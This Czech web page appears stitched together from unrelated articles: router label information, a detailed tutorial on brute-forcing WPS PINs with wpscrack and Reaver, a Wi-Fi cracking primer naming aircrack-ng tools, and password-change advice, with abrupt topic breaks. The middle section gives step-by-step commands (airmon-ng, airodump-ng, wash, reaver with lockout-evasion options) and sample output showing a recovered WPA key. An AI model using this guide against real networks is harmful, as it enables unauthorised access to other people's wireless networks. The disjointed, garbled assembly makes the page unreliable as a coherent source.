• Jak zjistit klíč bezdrátové sítě. Bezpečnostní klíč sítě Wi-Fi: co to je a jak jej najít

    Nezřídka se objevují komentáře, ve kterých se mě ptají, kde na routeru vidíte heslo k Wi-Fi síti, tovární login a heslo, adresu routeru nebo MAC adresu. Téměř každé síťové zařízení má mnoho užitečných továrních informací. A pokud se rozhodnete nakonfigurovat router sami, pak se vám tyto informace budou určitě hodit.

    Nejčastěji je nutné podívat se na heslo Wi-Fi, které je na routeru nainstalováno z výroby. Je to také bezpečnostní klíč neboli PIN kód. A to vše proto, že nyní většina výrobců z továrny nastavuje heslo pro Wi-Fi. Když si koupíte nový router nebo proveďte obnovení továrního nastavení a poté se připojte k bezdrátové síti (který má tovární název), musíte zadat heslo (PIN kód). Přinejmenším za účelem přejít do nastavení routeru a změnit tovární bezpečnostní klíč. Je pravda, že existují modely, ve kterých není bezdrátová síť ve výchozím nastavení chráněna.

    Téměř na všech routerech a modemech jsou tovární informace zapsány na těle samotného zařízení. Nejčastěji se jedná o nálepku s informacemi na spodní straně routeru.

    Upozorňujeme, že v závislosti na výrobci a modelu zařízení mohou některé informace chybět. Například pokud je zapnuto routery ZyXEL neexistuje tovární heslo a přihlášení pro vstup do ovládacího panelu, samozřejmostí je, že nebude specifikováno. A pokud síť Wi-Fi není ve výchozím nastavení zabezpečená, heslo není potřeba.

    Nyní se blíže podíváme na informace o zařízeních nejoblíbenějších výrobců.

    Bezpečnostní klíč Wi-Fi (PIN) a další tovární informace

    Jaké informace lze nalézt na routeru:

    1. Jméno sítě nebo SSID je tovární název sítě Wi-Fi. To může být užitečné pro nalezení vaší sítě mezi sousedními sítěmi. Zpravidla to vypadá nějak takto: "TP-LINK_3Ao8". Samozřejmě na zařízeních od TP-Linku.
    2. WiFi heslo, Bezdrátové heslo, PIN, WPS/PIN je tovární klíč pro přístup k bezdrátové síti. Obvykle se skládá z 8 číslic. Ale může to být i složitější. Po zadání nastavení routeru vám doporučuji změnit tovární heslo a také název sítě.
    3. adresa routeru(IP, webová adresa) – tato adresa je potřeba pro zadání nastavení routeru. Může to být buď IP adresa, obvykle , nebo , nebo název hostitele (z písmen) . Například: tplinkwifi.net, my.keenetic.net, miwifi.com. Zároveň funguje i přístup podle IP adresy.
    4. Uživatelské jméno a heslo(Uživatelské jméno, Heslo) - tovární přihlašovací jméno a heslo, které musíte zadat na autorizační stránce při zadávání nastavení routeru nebo modemu. Obvykle je v procesu nastavování routeru měníme.
    5. MAC adresa- může být také užitečné. Zvláště pokud se váš ISP váže podle MAC adresy.
    6. Model routeru a verze hardwaru(Rev, H / W Ver) - může být užitečné například pro vyhledání firmwaru nebo jiných informací.
    7. F/W Ver– Verze firmwaru nainstalovaná ve výrobě. Není uvedeno na všech zařízeních.

    Na příkladu routeru TP-Link

    Čísla ze snímku obrazovky odpovídají seznamu, který můžete vidět výše. Na všech zařízeních od Továrna TP-Link Informace jsou na štítku na spodní straně routeru.

    Tovární informace o routeru ASUS

    Vezměte prosím na vědomí, že na routery ASUS heslo bude podepsáno jako „PIN kód“. A síť se nejspíš bude jmenovat „ASUS“.

    Heslo Wi-Fi na těle routeru D-Link

    Na zařízeních D-Link vypadají tovární informace asi takto:

    Bezpečnostní klíč a další informace o ZyXEL

    Malá vlastnost. ZyXEL Keenetic nemá z výroby nastaveno uživatelské jméno a heslo, které se zadávají při vstupu do ovládacího panelu. Router vás vyzve k nastavení vašich dat ihned po zadání nastavení.

    Adresa, heslo, MAC adresa na routerech Tenda

    Tenda má vše standardní. Pokud není uveden název sítě Wi-Fi a uživatelské jméno.

    Totolink

    Na mém routeru Totolink jsou některé informace vytištěny na pouzdru.

    A MAC adresu, model, verzi hardwaru a pokud tomu rozumím sériové číslo uvedené na spodní straně na malé nálepce s čárovým kódem.

    Informace o routeru Netis

    Adresa pro zadání nastavení: netis.cc. A tak se vše zdá být standardní: MAC, SSID, Heslo.

    Myslím, že tato informace bude stačit.

    Pokud tovární informace nevyhovují, například přihlašovací jméno a heslo, je pravděpodobné, že tyto informace byly změněny v nastavení routeru. Chcete-li vrátit router do továrního nastavení, musíte nastavení resetovat. Chcete-li to provést, podržte tlačítko po dobu 15 sekund. Tlačítko reset(Resetovat). Poté bude router jako nový. Všechna nastavení budou smazána.

    Pokud máte co dodat k tématu článku, nebo máte nějaké dotazy, napište do komentářů. Všechno nejlepší!

    Není to tak dávno, co se zdálo, že bezdrátová síť chráněná pomocí technologie WPA2 je docela bezpečná. Opravdu je možné vyzvednout jednoduchý klíč k připojení. Pokud ale nastavíte opravdu dlouhou klávesu, pak to nepomohou svázat ani duhové tabulky, ani akcelerace GPU. Jak se ale ukázalo, k bezdrátové síti se můžete připojit i bez něj – pomocí nedávno objevené zranitelnosti v protokolu WPS.

    VAROVÁNÍ

    Veškeré informace jsou poskytovány pouze pro vzdělávací účely. Průnik do cizí bezdrátové sítě lze snadno považovat za trestný čin. Mysli hlavou.

    Cena zjednodušení

    Otevřených přístupových bodů, ke kterým nemusíte vůbec zadávat klíč pro připojení, je stále méně. Zdá se, že brzy mohou být uvedeny v červené knize. Pokud dříve člověk možná ani neví, že bezdrátovou síť lze uzavřít klíčem a chránit se před vnější spojení, ale nyní se mu o této možnosti stále častěji říká. Vezměte si alespoň vlastní firmware, které vydávají přední poskytovatelé pro oblíbené modely routery pro zjednodušení nastavení. Musíte zadat dvě věci - přihlašovací jméno / heslo a ... klíč pro ochranu bezdrátové sítě. Ještě důležitější je, že samotní výrobci hardwaru se snaží proces nastavení zjednodušit. Většina moderních směrovačů tedy podporuje mechanismus WPS (Wi-Fi Protected Setup). S jeho pomocí může uživatel nastavit bezpečnou bezdrátovou síť během několika sekund, aniž by se vůbec obtěžoval tím, že „někde jinde musíte povolit šifrování a zaregistrovat klíč WPA“. Zadáte do systému osmimístný kód PIN, který je napsán na routeru – a máte hotovo! A tady se pevně držte. V prosinci hned dva výzkumníci hovořili o vážných zásadních chybách v protokolu WPS. Je to jako zadní vrátka pro každý router. Ukázalo se, že pokud je na přístupovém bodu aktivováno WPS (což je na okamžik ve většině směrovačů ve výchozím nastavení povoleno), můžete si během několika hodin vyzvednout PIN pro připojení a získat klíč pro připojení!

    Jak funguje WPS?

    Nápad tvůrců WPS je dobrý. Mechanismus automaticky nastaví název sítě a šifrování. Uživatel tak nemusí chodit do webového rozhraní a řešit složitá nastavení. A do již nakonfigurované sítě můžete snadno přidat jakékoli zařízení (například notebook): pokud správně zadáte PIN, obdrží všechna potřebná nastavení. To je velmi výhodné, a proto nyní všichni hlavní hráči na trhu (Cisco/Linksys, Netgear, D-Link, Belkin, Buffalo, ZyXEL) nabízejí bezdrátové routery s podporou WPS. Pojďme tomu trochu více rozumět.

    Existují tři možnosti použití WPS:

    1. Push Button Connect (PBC). Uživatel stiskne speciální tlačítko na routeru (hardware) a na počítači (software), čímž aktivuje proces konfigurace. nemáme zájem.
    2. Zadání PIN kódu ve webovém rozhraní. Uživatel vstoupí přes prohlížeč do administrativního rozhraní routeru a zadá osmimístný PIN kód napsaný na pouzdru zařízení (obrázek 1), poté proběhne proces konfigurace. Tato metoda je vhodnější pro počáteční konfiguraci routeru, takže ji také nebudeme uvažovat.
    3. Zadání kódu PIN na počítači uživatele (obrázek 2). Při připojování k routeru můžete otevřít speciální relaci WPS, v rámci které můžete nakonfigurovat router nebo získat stávající nastavení, pokud správně zadáte PIN kód. Teď je to atraktivní. K otevření takové relace není vyžadováno žádné ověření. Tohle může udělat každý! Ukazuje se, že PIN kód je již potenciálně náchylný k útoku hrubou silou. Ale to jsou jen květiny.

    Zranitelnost

    Jak jsem již dříve poznamenal, PIN se skládá z osmi číslic – existuje tedy 10^8 (100 000 000) možností, ze kterých si můžete vybrat. Počet možností však lze výrazně snížit. Faktem je, že poslední číslice PIN kódu představuje určité kontrolní součet, která se počítá na základě prvních sedmi číslic. Výsledkem je, že již dostáváme 10 ^ 7 (10 000 000) možností. Ale to není všechno! Dále se pečlivě podíváme na zařízení autentizačního protokolu WPS (obrázek 3). Zdá se, že byl speciálně navržen tak, aby ponechal možnost hrubé síly. Ukazuje se, že kontrola PIN kódu se provádí ve dvou fázích. Je rozdělena na dvě stejné části a každá část je kontrolována samostatně! Podívejme se na diagram:

    1. Pokud po odeslání zprávy M4 útočník obdržel jako odpověď EAP-NACK, pak si může být jistý, že první část PIN kódu je nesprávná.
    2. Pokud obdržel EAP-NACK po odeslání M6, pak je druhá část PIN kódu nesprávná. Dostaneme 10^4 (10 000) možností pro první polovinu a 10^3 (1 000) pro druhou. Výsledkem je, že máme pouze 11 000 možností pro kompletní výčet. Chcete-li lépe pochopit, jak to bude fungovat, podívejte se na diagram.
    3. Důležitým bodem je možná rychlost výčtu. Je omezena rychlostí, jakou router zpracovává požadavky WPS: některé přístupové body vydají výsledek každou sekundu, jiné každých deset sekund. Většinu času stráví výpočet veřejný klíč podle Diffie-Hellmanova algoritmu musí být vygenerován před krokem M3. Čas strávený na tom lze zkrátit volbou jednoduchého tajného klíče na straně klienta, což dále zjednoduší výpočet ostatních klíčů. Praxe ukazuje, že k úspěšnému výsledku většinou stačí protřídit jen polovinu všech možností a v průměru zabere hrubá síla jen čtyři až deset hodin.

    První implementace

    První implementací hrubou silou, která se objevila, byla utilita wpscrack (goo.gl/9wABj), kterou napsal výzkumník Stefan Fiböck dne jazyk Python. Obslužný program používal knihovnu Scapy, která vám umožňuje vkládat libovolné síťové balíčky. Skript lze spustit pouze pod systémem Linux po přepnutí bezdrátového rozhraní do monitorovacího režimu. Název musí být uveden jako parametry. síťové rozhraní v systému, MAC adresu bezdrátového adaptéru a MAC adresu přístupového bodu a jeho název (SSID).

    $ ./wpscrack.py --iface mon0 --client 94:0c:6d:88:00:00 --bssid f4:ec:38:cf:00:00 --ssid testap -v sniffer začal zkoušet 00000000 pokus trval 0,95 sekundy pokus 00010009<...>pokus o 18660005 pokus trval 1,08 sekundy pokus 18670004# nalezen První polovina pokusu o PIN trvala 1,09 sekundy pokus 18670011 pokus trval 1,08 sekundy<...>pokusem 18674095# nalezena 2. polovina PIN<...>Síťový klíč: 0010 6E 67 5F 77 70 61 5F 70 61 73 73 70 68 72 61 73 ng_wpa_pass phras 0020 65 5F 67 6F 6F 64 56 3 2 6C 1 good_luck_crac 0030 6B 69 6E 67 5F 74 68 69 73 5F 6F 6E 65king_this_one<...>

    Jak vidíte, nejprve byla vybrána první polovina PIN kódu, poté druhá a nakonec program vydal klíč připravený k použití pro připojení k bezdrátové síti. Je těžké si představit, jak dlouho by trvalo uhodnout klíč této délky (61 znaků) s již existujícími nástroji. Wpscrack však není jedinou utilitou, která tuto zranitelnost zneužívá, a to je docela vtipný moment: ve stejnou dobu na stejném problému pracoval jiný výzkumník Craig Heffner z Tactical Network Solutions. Když viděl, že se na webu objevilo funkční PoC k provedení útoku, zveřejnil svůj nástroj Reaver. Nejenže automatizuje proces hrubou silou WPS-PIN a extrahuje klíč PSK, ale nabízí také více nastavení, takže útok lze provést proti široké škále směrovačů. Navíc podporuje mnohem větší počet bezdrátových adaptérů. Rozhodli jsme se to vzít jako základ a podrobně popsat, jak může útočník využít zranitelnost v protokolu WPS pro připojení k zabezpečené bezdrátové síti.

    JAK

    Stejně jako u každého jiného útoku na bezdrátovou síť budeme potřebovat Linux. Zde je třeba říci, že Reaver je přítomen v úložišti známé distribuce BackTrack, která také již obsahuje požadované ovladače pro bezdrátová zařízení. Proto jej využijeme.

    Krok 0. Připravte systém

    Na oficiálních stránkách je BackTrack 5 R1 k dispozici ke stažení jako virtuální stroj pod VMware a spouštěcí obrázek ISO. Doporučuji poslední možnost. Obraz můžete jednoduše vypálit na disk, nebo můžete použít program k vytvoření spouštěcí flash disk: tak či onak, bootováním z takového média budeme mít systém okamžitě připravený k práci bez zbytečných problémů.

    Wi-Fi Hacking Crash Course

    1. WEP (Drátové Ekvivalentní soukromí) Úplně první technologie pro zabezpečení bezdrátové sítě se ukázala jako extrémně slabá. Může být hacknut během několika minut s využitím slabin šifry RC4, která je v něm použita. Hlavními nástroji jsou airodump-ng sniffer pro shromažďování paketů a aircrack-ng utilita používaná přímo k prolomení klíče. Existuje také speciální nástroj wesside-ng, který obecně hackuje všechny blízké body pomocí WEP v automatickém režimu.
    2. WPA/WPA2 (chráněný bezdrátový přístup)

    Hrubá síla je jediný způsob, jak najít klíč pro uzavřenou WPA / WPA2 síť (a i to pouze v případě, že dojde k dumpu tzv. WPA Handshake, který se vysílá, když se klient připojí k přístupovému bodu).

    Hrubá síla se může táhnout dny, měsíce i roky. Pro zvýšení efektivity výčtu byly nejprve použity specializované slovníky, poté byly generovány duhové tabulky a později se objevily utility, které využívaly technologie NVIDIA CUDA a ATI Stream pro hardwarová akcelerace proces přes GPU. Používané nástroje jsou aircrack-ng (slovník brute force), cowpatty (pomocí rainbow tables), pyrit (pomocí grafické karty).

    Krok 1. Přihlášení

    Výchozí přihlašovací jméno a heslo je root:toor. Jakmile jste v konzole, můžete bezpečně spustit "x" (existují samostatná sestavení BackTrack - jak s GNOME, tak s KDE):

    #startx

    Krok 2 Nainstalujte Reaver

    Ke stažení Reaveru potřebujeme internet. Proto připojujeme propojovací kabel nebo konfigurujeme bezdrátový adaptér(nabídka "Aplikace > Internet > Wicd Network Manager"). Dále spustíme emulátor terminálu, kam načteme Nejnovější verze utility přes úložiště:

    # apt-get update # apt-get install reaver

    Zde musím říci, že úložiště obsahuje verzi 1.3, která mně osobně osobně nefungovala. Při hledání informací o problému jsem našel příspěvek autora, který doporučuje upgrade na nejvyšší možnou verzi kompilací zdrojů převzatých z SVN. To je obecně nejvíc univerzální způsob instalace (pro jakoukoli distribuci).

    $ svn checkout http://reaver-wps.googlecode.com/svn/trunk/ reaver-wps $ cd ./reaver-wps/src/ $ ./configure $ make # make install

    S montáží pod BackTrack nebudou žádné problémy - osobně jsem to kontroloval. Na distribuci Arch Linux, kterou používám, je instalace ještě jednodušší díky příslušnému PKGBUILD:

    $ yaourt -S reaver-wps-svn

    Krok 3. Příprava na hrubou sílu

    Chcete-li použít Reaver, musíte udělat následující věci:

    • přepněte bezdrátový adaptér do monitorovacího režimu;
    • zjistěte název bezdrátového rozhraní;
    • zjistit MAC adresu přístupového bodu (BSSID);
    • ujistěte se, že je v bodě povoleno WPS.

    Nejprve zkontrolujte, zda je bezdrátové rozhraní v systému vůbec přítomno:

    # iwconfig

    Pokud výstup tohoto příkazu obsahuje rozhraní s popisem (obvykle je to wlan0), pak systém adaptér rozpoznal (pokud se připojil k bezdrátové síti pro stažení Reaveru, pak je lepší připojení odpojit). Přepněte adaptér do monitorovacího režimu:

    # airmon-ng start wlan0

    Tento příkaz vytvoří virtuální rozhraní v monitorovacím režimu, jeho jméno bude uvedeno na výstupu příkazu (obvykle mon0). Nyní musíme najít přístupový bod k útoku a zjistit jeho BSSID. Použijme nástroj k poslechu bezdrátového vysílání airodump-ng:

    # airodump-ng mon0

    Na obrazovce se zobrazí seznam přístupových bodů v dosahu. Zajímají nás body se šifrováním WPA / WPA2 a autentizací klíčem PSK.

    Je lepší vybrat si jednu z prvních v seznamu, protože je žádoucí provést útok dobré spojení s tečkou. Pokud je bodů mnoho a seznam se nevejde na obrazovku, můžete použít další známou utilitu - kismet, kde je rozhraní v tomto ohledu více přizpůsobeno. Volitelně můžete na místě zkontrolovat, zda je v našem bodě povolen mechanismus WPS. Chcete-li to provést, spolu s Reaverem (ale pouze pokud jej převezmete ze SVN) přichází mycí nástroj:

    # ./mytí -i mon0

    Parametr určuje název rozhraní, které bylo přepnuto do monitorovacího režimu. Můžete také použít volbu ‚-f‘ a vložit nástroji soubor cap vytvořený například stejným airodump-ng. Z nějakého neznámého důvodu BackTrack nezahrnoval mycí nástroj v balíčku Reaver. Doufejme, že do vydání článku bude tato chyba opravena.

    Krok 4. Spusťte hrubou sílu

    Nyní můžete přejít přímo k výčtu PIN. Chcete-li spustit Reaver v nejjednodušším případě, potřebujete trochu. Stačí zadat název rozhraní (které jsme dříve přepnuli do režimu monitorování) a BSSID přístupového bodu:

    # reaver -i mon0 -b 00:21:29:74:67:50 -vv

    Přepínač "-vv" zapne rozšířený výstup programu, abychom se mohli ujistit, že vše funguje, jak má.

    Reaver v1.4 WiFi Protected Setup Attack Tool Copyright (c) 2011, Tactical Network Solutions, Craig Heffner [+] Čekání na maják od 00:21:29:74:67:50 [+] Přidruženo k 00:21:29:74:67:50 (ESSID: linksys) [+] Pokus o pin 63979978

    Pokud program důsledně odesílá PINy do přístupového bodu, pak vše začalo dobře a zůstává hloupé čekat. Proces může trvat dlouho. Většina krátký čas, u kterého se mi podařilo brutálně vynutit PIN, bylo asi pět hodin. Jakmile bude vybrán, program rád oznámí toto:

    [+] Pokus o PIN 64637129 [+] Klíč prasklý za 13654 sekund [+] WPS PIN: "64637129" [+] WPA PSK: "MyH0rseThink$YouStol3HisCarrot!" [+] AP SSID: "linksys"

    Nejcennější je zde samozřejmě klíč WPA-PSK, který lze okamžitě použít k připojení. Všechno je tak jednoduché, že se to ani nevejde do hlavy.


    Je možné se bránit?

    Před útokem se zatím můžete chránit jedním způsobem – vypnout WPS v nastavení routeru. Pravda, jak se ukázalo, ne vždy je to možné. Vzhledem k tomu, že zranitelnost neexistuje na úrovni implementace, ale na úrovni protokolu, nevyplatí se čekat na brzký patch od výrobců, který by všechny problémy vyřešil. To, co teď mohou udělat, je co nejvíce odolávat hrubé síle. Pokud například zablokujete WPS na jednu hodinu po pěti neúspěšných pokusech o zadání PIN kódu, bude hledání trvat asi 90 dní. Další otázkou však je, jak rychle lze takový patch nasadit na miliony zařízení, která fungují po celém světě?

    Aktualizace Reaveru

    V HOWTO jsme ukázali nejjednodušší a nejuniverzálnější způsob použití nástroje Reaver. Nicméně implementace WPS různých výrobců různé, takže v některých případech je to nutné dodatečné nastavení. Níže poskytnu další možnosti, což může zlepšit rychlost a efektivitu výčtu klíčů.

    1. Můžete nastavit číslo kanálu a SSID přístupového bodu: # reaver -i mon0 -b 00:01:02:03:04:05 -c 11 -e linksys
    2. Možnost '--dh-small', která nastavuje malou hodnotu, má příznivý vliv na rychlost hrubou silou. tajný klíč, čímž se usnadní výpočty na straně přístupového bodu: # reaver -i mon0 -b 00:01:02:03:04:05 -vv --dh-small
    3. Výchozí doba odezvy je pět sekund. V případě potřeby jej můžete změnit: # reaver -i mon0 -b 00:01:02:03:04:05 -t 2
    4. Výchozí prodleva mezi opakováním je jedna sekunda. Lze jej také nakonfigurovat: # reaver -i mon0 -b 00:01:02:03:04:05 -d 0
    5. Některé přístupové body mohou blokovat WPS určitý čas, v podezření, že se pokoušejí šukat. Reaver si této situace všimne a ve výchozím nastavení pozastaví iteraci na 315 sekund, dobu trvání této pauzy lze změnit: # reaver -i mon0 -b 00:01:02:03:04:05 --lock-delay=250
    6. Některé implementace protokolu WPS ukončí připojení, pokud je PIN nesprávný, ačkoli specifikace vyžaduje, aby vrátily speciální zprávu. Reaver tuto situaci automaticky rozpozná, proto je zde možnost '--nack': # reaver -i mon0 -b 00:01:02:03:04:05 --nack
    7. Možnost „--eap-terminate“ je pro ty přístupové body, které vyžadují, aby relace WPS skončila zprávou EAP FAIL: # reaver -i mon0 -b 00:01:02:03:04:05 --eap-terminate
    8. Výskyt chyb v relaci WPS může znamenat, že přístupový bod omezuje počet pokusů o zadání PIN kódu nebo je jednoduše přetížen požadavky. Tyto informace se zobrazí na obrazovce. V tomto případě Reaver pozastaví svou činnost a dobu pauzy lze nastavit pomocí možnosti '--fail-wait': # reaver -i mon0 -b 00:01:02:03:04:05 --fail-wait =360

    FAQ

    Otázka: Jaký bezdrátový adaptér je potřeba pro hackování?

    Odpověď: Před experimentováním se musíte ujistit, že bezdrátový adaptér může pracovat v režimu monitoru. Nejlepší způsob- zkontrolujte seznam podporovaného hardwaru na webu projektu Aircrack-ng. Vyvstane-li otázka jakou bezdrátový modul koupit, můžete začít s jakýmkoli adaptérem založeným na čipové sadě RTL8187L. USB dongle lze snadno najít online za 20 USD.

    Otázka: Proč se mi zobrazují chyby „timeout“ a „mimo provoz“?

    Odpověď: To je obvykle způsobeno nízká úroveň signál a špatné spojení s přístupovým bodem. Přístupový bod může navíc dočasně blokovat použití WPS.

    Otázka: Proč mi nefunguje spoofing MAC adresy?

    Odpověď: Možná podvrhujete MAC virtuálního rozhraní mon0 a to nebude fungovat. Musíte zadat název skutečného rozhraní, například wlan0.

    Otázka: Proč špatný signál Reaver funguje špatně, i když stejné crackování WEP funguje dobře?

    Odpověď: K praskání WEP obvykle dochází opakovaným odesláním zachycených paketů, aby se získalo více inicializačních vektorů (IV) potřebných pro úspěšné prolomení. V tomto případě nezáleží na tom, zda se paket cestou ztratil nebo se nějak poškodil. Pro útok na WPS je ale nutné striktně dodržovat protokol přenosu paketů mezi přístupovým bodem a Reaverem a zkontrolovat každý PIN kód. A pokud se ve stejnou dobu ztratí nějaký paket nebo přijde v neslušné formě, budete muset znovu navázat relaci WPS. Díky tomu jsou útoky WPS mnohem více závislé na síle signálu. Je také důležité si uvědomit, že pokud váš bezdrátový adaptér vidí přístupový bod, neznamená to, že přístupový bod vidí vás. Takže pokud jste šťastný majitel vysoce výkonný adaptér od ALFA Network a anténu za pár desítek dBi, pak nedoufejte, že se vám podaří prolomit všechny chycené přístupové body.

    Otázka: Reaver posílá přístupovému bodu stále stejný PIN, co je špatně?

    Odpověď: Zkontrolujte, zda je na routeru povoleno WPS. To lze provést pomocí mycího nástroje: spusťte jej a zkontrolujte, zda je váš cíl na seznamu.

    Otázka: Proč se nemohu spojit s přístupovým bodem?

    Odpověď: To může být způsobeno špatná úroveň signál nebo protože váš adaptér není pro takový výzkum vhodný.

    Otázka: Proč se mi stále objevují chyby „zjištěno omezení rychlosti“? Odpověď: Je to proto, že přístupový bod zablokoval WPS. Obvykle se jedná o dočasné zablokování (cca pět minut), ale v některých případech lze vyhodit i trvalý ban (odblokování pouze přes administrativní panel). V Reaveru verze 1.3 je jedna ošklivá chyba, kvůli které není odstranění takových zámků detekováno. Jako řešení se doporučuje použít možnost „--ignore-locks“ nebo stáhnout nejnovější verzi ze SVN.

    Otázka: Je možné spustit dvě nebo více instancí Reaveru současně pro urychlení útoku?

    Odpověď: Teoreticky je to možné, ale pokud zatlučou stejný přístupový bod, pak se rychlost výčtu sotva zvýší, protože v tento případ je omezena na slabý hardware přístupového bodu, který je již plně zatížen jedním útočníkem.

    Pokud byl router právě zakoupen a nikdo jej nenakonfiguroval, můžete se připojit k nově vytvořené síti bez zadávání jakýchkoliv identifikačních údajů. Tedy každý majitel zařízení s Wi-Fi modul mohou využívat všechny lahůdky internetu bez povolení majitele zařízení. Abyste tomu zabránili, musíte ihned po vytvoření sítě změnit heslo na Wi-Fi routeru.

    Snad vzhled dalšího uživatele nebude mít vliv na rychlost - většina poskytovatelů je schopna poskytnout slušnou úroveň neomezený provoz. Ale bohužel ne všechno je tak jednoduché. Existuje řada negativních okolností, na jejichž možnost je třeba pamatovat a ponechat síť bez řádné ochrany.

    Každé připojené zařízení vyžaduje, aby modem přidělil IP adresu a hardwarové prostředky pro zajištění komunikace. To vše vytváří dodatečné zatížení distribučního zařízení, což zase negativně ovlivní rychlost a stabilitu připojení jako celku. Navíc absence ochrana heslem, snižuje celkovou úroveň zabezpečení a poněkud zjednodušuje přístup k osobním informacím.

    Výše uvedené stačí na to, abyste se zamysleli nad změnou nastavení autorizace, zvláště pokud žádné nejsou, například při spuštění nového routeru. Dále zvažte, jak rychle změnit nebo nainstalovat heslo wifi na routerech od různých výrobců (neplést s nastavením přihlášení na admin panelu). Někteří budou ovlivněni důležité body ohledně nastavení zabezpečení.

    Pravidla hesla

    Ne každý je schopen zajistit správnou úroveň zabezpečení. nové heslo. Mnoho uživatelů, zejména začátečníků, raději neblázní hlavu a vstoupí do sady jednoduchá čísla, například všechny jednotky nebo 12345678. Kreativnější použijte své jméno nebo datum narození. Význam je jasný: krátce přemýšlet a snadno si zapamatovat.

    Video o sestavování správného hesla:

    Hacknutí sítě s takovou ochranou nezabere déle než 5 minut i školákovi, který není líný přečíst si pár článků na internetu. Existuje mnoho programů, které přicházejí s velkými slovníky často používaných bezpečnostních klíčů. Stačí mít touhu běžný notebook nebo chytrý telefon, který poskytuje bezplatný přístup k síti neopatrných sousedů.

    Jaké by mělo být nové heslo:

    • Musíte použít 8 nebo více znaků (méně to standard nedovolí);
    • Mělo by se skládat z latinská písmena různá velká a malá písmena (velká a malá), čísla, znaky (@$# a další);
    • Posloupnost znaků musí být náhodná a různorodá. To znamená, že nemusíte zadávat 6 stejných písmen, ale na konci několik znaků a čísel. dobré heslo by měl vyvolat strach při pomyšlení, že je třeba si to pamatovat.
    • Jak je uvedeno výše, ne prvočísla, jména a data narození.

    Pro některé uživatele je obtížné přijít na náhradní heslo sami. Pak se můžete uchýlit k pomoci speciálních online generátorů, které vytvoří kód libovolné délky a složitosti. Kromě toho síť disponuje službami pro výběr a uložení ochranných dat.

    Video o práci s nástrojem pro vytváření a ukládání hesel:

    Po vhodné heslo byl vynalezen nebo vytvořen, musí být uložen. Neměli byste se spoléhat na vlastní paměť, je lepší si ji zapsat na papír, například do sešitu. Souběžně s papírovou verzí můžete tvořit textový soubor na počítači.

    Předpokládejme, že heslo je vygenerováno nebo vynalezeno, zaznamenáno a uloženo na několika médiích. Dokud se to nepoužívá v nastavení, je to málo použitelné. zabezpečení wifi sítí. Dále zvažte proces změny hesla na routeru.

    Změna hesla

    Chcete-li změnit nastavení zabezpečení přístupového bodu, musíte se dostat do jeho rozhraní pro správu. K tomu je potřeba použít adresní řádek prohlížeče nebo utilitu dodávanou na disku u některých routerů. První způsob je jednodušší a všestrannější.

    Nejprve zjistěte IP adresu routeru. Ve většině případů je to . Přesná hodnota je uvedena na štítku na spodní straně zařízení.

    Tam lze také zjistit data pro autorizaci uživatele, standardně nastavená. Jak je vidět z obrázku, přihlašovací jméno a heslo jsou admin. Tato kombinace je relevantní pro většinu modelů. Pokud se nálepka náhle ztratí nebo smaže, nezbytné informace je v návodu, pokud návod není, podíváme se na internet.

    Zde musíte aktivovat přepínač označený červenou šipkou a poté upravit okraje níže.

    • Verze. Nechte "Automaticky" pro správné fungování S velké množství zařízení.
    • Šifrování. Vybíráme AES (nejspolehlivější a nejosvědčenější standard).
    • heslo PSK. Do tohoto pole zadejte vymyšlený nebo vygenerovaný síťový bezpečnostní klíč.

    Po zadání všech potřebných parametrů potvrdíme změny stisknutím tlačítka "Uložit" a restartujeme router. Nabídka na restart se zobrazí na stejné stránce. Pokud tomu tak není, je restart volitelný, ale měl by být proveden tak, aby byli autorizováni všichni připojení uživatelé Wi-Fi. To lze provést pomocí systémových nástrojů.

    Po všech výše uvedených manipulacích bude první přístup k bezdrátové síti možný pouze po zadání hesla. Pokud budete časem potřebovat znovu nainstalovat bezpečnostní data, budete muset postupovat stejně jako při instalaci nového autorizačního klíče.

    Potíže, které mohou nastat během nastavování zabezpečení

    Nejčastějšími problémy jsou absence nebo ztráta IP adresy admin panelu nebo autentizačních údajů v něm. Je to vyřešeno jednoduše: firmware routeru je uveden do továrního stavu pomocí speciálního tlačítka.

    U modelu TP-Link je nutné jej stisknout a podržet po dobu 10 sekund. Nastavení se obnoví na tovární nastavení a budete se moci přihlásit pomocí standardní adresa pomocí dvojice admin/admin pro autorizaci.

    Pokud dojde ke ztrátě nebo změně IP adresy (například byla změněna, pokud je v síti několik stejných routerů), můžete to zjistit spuštěním konzole Windows na notebooku nebo PC. Chcete-li to provést, musíte zadat kombinaci "Windows + R", otevře se okno "Spustit", do kterého zadáme "cmd". Konzole se spustí. Do něj napíšeme „ipconfig“ a stiskneme „Enter“.

    Naproti nápisu "Hlavní brána" bude adresa routeru, ke kterému je zařízení připojeno.

    Změna hesla na populárních routerech

    Pomocí výše uvedené sekvence akcí můžete změnit heslo na libovolném směrovači Wi-Fi. Rozdíly mohou být v rozhraní správy přístupového bodu, jeho adrese a autorizačních údajích. Dále musíte najít záložku ochrany bezdrátový mód nebo podobnou položku nabídky. Pojďme se blíže podívat na to, jak se mění heslo u populárních modelů.

    D-Link

    Adresa: 192.168.0.1. Pár login/heslo: admin. Na domovská stránka V dolní části vyberte „Pokročilá nastavení“.

    Na dalším vyberte „Nastavení zabezpečení“ (zakroužkováno).


    To je přirozený jev, protože klientské zařízení se snaží používat starý klíč která již není aktuální. Problém se řeší dvěma způsoby:

    1. Na mobilní android zařízení, stačí přerušit spojení se sítí a znovu jej navázat pomocí nového přístupového kódu.
    2. U systémů Windows musíte nejprve odstranit síť a poté ji znovu přidat se správnými autorizačními daty.

    Po vyřešení těchto drobných problémů by síť měla fungovat správně. Tato ochrana je dostatečná pro domácí použití. Pokud je potřeba zorganizovat zabezpečení v kanceláři nebo podniku, je třeba se uchýlit k sofistikovanějším metodám.

    Každý uživatel ví, že při pokusu o připojení k zabezpečeným bezdrátovým sítím se často zobrazuje zpráva „Zadejte klíč zabezpečení sítě“. Co je tento klíč, k čemu slouží, jak se používá, kde jej najít a jak jej určit různé metody, a bude dále zvažován. Ve skutečnosti každý uživatel již ví, co to je, ale možná prostě nezná skutečný stav věcí. Ve skutečnosti po přečtení níže uvedeného materiálu již žádný uživatel nebude mít všechny otázky související s pochopením samotného termínu a metod používaných k určení takového klíče.

    Co je to obecně klíč zabezpečení sítě?

    Jaké je tedy chápání tohoto pojmu? Pokud by někdo nevěděl, bezpečnost bezdrátových sítí zajišťuje ochrana před neoprávněným přístupem do sítě a šifrování přenášených a přijímaných dat.

